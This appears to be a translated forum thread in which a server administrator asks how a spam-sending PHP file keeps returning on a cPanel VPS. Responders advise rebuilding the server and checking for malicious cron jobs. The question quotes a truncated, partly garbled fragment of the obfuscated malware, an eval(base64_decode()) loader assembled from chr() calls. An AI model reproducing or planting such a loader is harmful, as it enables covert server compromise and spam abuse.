Вирус продолжает появляться. Как я могу найти дыру в безопасности?

0

Я только недавно начал работать с этим клиентом, и когда я попал на его сервер, он был полон вирусов. По крайней мере 4 из его пользователей cpanel имели вирусы на своих сайтах (полностью им управляемые). При запуске вирусы рассылали спам-сообщения со скоростью 5 в секунду. Я прошел и удалил все вирусы, поработал над дырами в безопасности и т. Д. Я остановил поступление всех спам-писем, но есть один файл php, который появляется снова каждый раз, когда я его удаляю. Я удалил его 31 марта, единственный файл снова появился 2 апреля. Я удалил его 3 апреля, он снова появился 7 апреля. Мне интересно, есть ли у кого-нибудь предложение, как мне найти дыру в безопасности.

В каталоге всего 9 файлов, из которых только один - php, не включая сам вирус. Это очень маленький сайт, и он почти полностью HTML. единственный другой файл PHP - это контактная форма. Я не думаю, что это что-то внутри каталога, но больше нигде в системе не появляются другие вирусы.

Какие-либо предложения?

РЕДАКТИРОВАТЬ

Вот как выглядит вирусный код в одной строке. это 3585 символов в длину.

$f7pm25=chr(112)."re".chr(10chr(103).chr(95)."\x72".chr(101).
"p\x6C\x61".chr(99)."e";$q1Y7Aj="e".chr(118)."\x61".chr(108)."
(b\x61\x73\x65\x364\x5F\x64".chr(101).chr(99)."o\x64".chr(101)."\x28\x22\x5
1".chr(71)."\x56".chr(121)."\x63\x6d".chr(57).chr(121)."\x58\x33J".chr(108)
."
Katushai
источник
1
К сожалению, нет единого способа проверить все вирусы и тому подобное. Ваша самая безопасная ставка - сделать резервную копию файлов для сайта, проверить их, а затем перестроить сервер (или попросить хостинговую компанию перезагрузить ваш портал), если вы считаете, что вирус все еще существует. Если вы не знаете больше о том, что это за вредоносная программа (то есть, появляется ли этот php-файл в virustotal или где-либо еще? Имя встречается в поиске? Как насчет контента?), То почти невозможно проверить, что он все вычищен.
Абраксас
Да, это трудно сделать. сейчас это VPS, принадлежащий моему боссу и управляемый мной. я добавил фрагмент кода из вируса выше
Katushai
Кроме того, он не обнаружен никакими вирусными сканерами или детекторами вредоносного ПО. но это определенно вирус, который рассылает электронные письма. он появился как источник электронных писем в exim_mainlog
Katushai
1
Похоже, вы должны взять "ядерное оружие с орбиты". Это означает, что вы настраиваете сервер с нуля или отключаете учетную запись пользователя, которая заражает сервер, и создаете им новую учетную запись.
Ramhound
2
Да, если вы хотите быть в безопасности, начните все сначала. Вы не представляете, какая задача запускает файл, который создается, какой пользователь его создает и т. Д. Даже если это было так просто, как кто-то взломал ваш сервер и настроил злонамеренное задание cron, вы не сможете узнать, поставили ли они этот файл. другие вещи в других местах. Кроме того, это не то место, где можно сказать, «как мне защитить« х »от« взлома ». Это гораздо больше форум для вопросов типа «как мне защитить эту единственную вещь от этой единственной вещи». Но очевидные советы: не используйте pws по умолчанию, используйте отдельные действия, будьте в курсе, минимизируйте поверхность (наименьшее количество услуг)
Abraxas